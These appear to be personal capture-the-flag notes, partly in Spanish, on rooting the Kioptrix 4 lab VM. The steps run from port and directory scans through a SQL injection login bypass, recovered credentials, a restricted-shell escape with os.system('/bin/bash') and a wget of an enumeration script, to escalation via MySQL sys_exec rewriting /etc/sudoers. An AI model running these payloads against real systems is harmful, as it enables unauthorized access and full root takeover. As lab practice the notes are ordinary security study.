192.168.111.133

nmap -sV -O -Pn 192.168.111.133
  PORT    STATE SERVICE     VERSION
  22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
  80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
  139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

enum4linux -a 192.168.111.133
  KIOPTRIX4       <00> -         B <ACTIVE>  Workstation Service
  KIOPTRIX4       <03> -         B <ACTIVE>  Messenger Service
  KIOPTRIX4       <20> -         B <ACTIVE>  File Server Service
  ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
  WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
  WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
  WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
 
Nikto nada

Gobuster
  /images (Status: 301)
  /member (Status: 302)
  /index (Status: 200)
  /logout (Status: 302)
  /john (Status: 301)
  /robert (Status: 301)
  /server-status (Status: 403)
  /.htaccess (Status: 403)
  /.htpasswd (Status: 403)
  /.hta (Status: 403)
  /cgi-bin/ (Status: 403)
  /index (Status: 200)
  /index.php (Status: 200)
  /images (Status: 301)
  /john (Status: 301)
  /member (Status: 302)
  /logout (Status: 302)
  /server-status (Status: 403)
  
En el formulario de la web
john / robert
' or '1'='1

Username 	: 	john
Password 	: 	MyNameIsJohn

Username 	: 	robert
Password 	: 	ADGAdsafdfwt4gadfga==

ssh john@192.168.111.133
echo os.system('/bin/bash')

more .bash_history 
  exit
  sudo su
  clear
  ls
  cd /home/loneferret
  ls
  ./nc
  rm nc
  exit
  
cat /proc/version
  Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009
  
cd /var/www
more database.sql
  CREATE TABLE `members` (
  `id` int(4) NOT NULL auto_increment,
  `username` varchar(65) NOT NULL default '',
  `password` varchar(65) NOT NULL default '',
  PRIMARY KEY (`id`)
  ) TYPE=MyISAM AUTO_INCREMENT=2 ;

  -- 
  -- Dumping data for table `members`
  -- 

  INSERT INTO `members` VALUES (1, 'john', '1234');

wget https://raw.githubusercontent.com/monkeysm8/LinEnum/master/LinEnum.sh
Vemos que mysql se ejecuta como root y sin contraseña

mysql -uroot
select sys_exec('chown USER:USER /etc/sudoers');
chmod 0751 /etc/sudoers
chmod 0440 /etc/sudoers
select sys_exec('chown root:root /etc/sudoers');


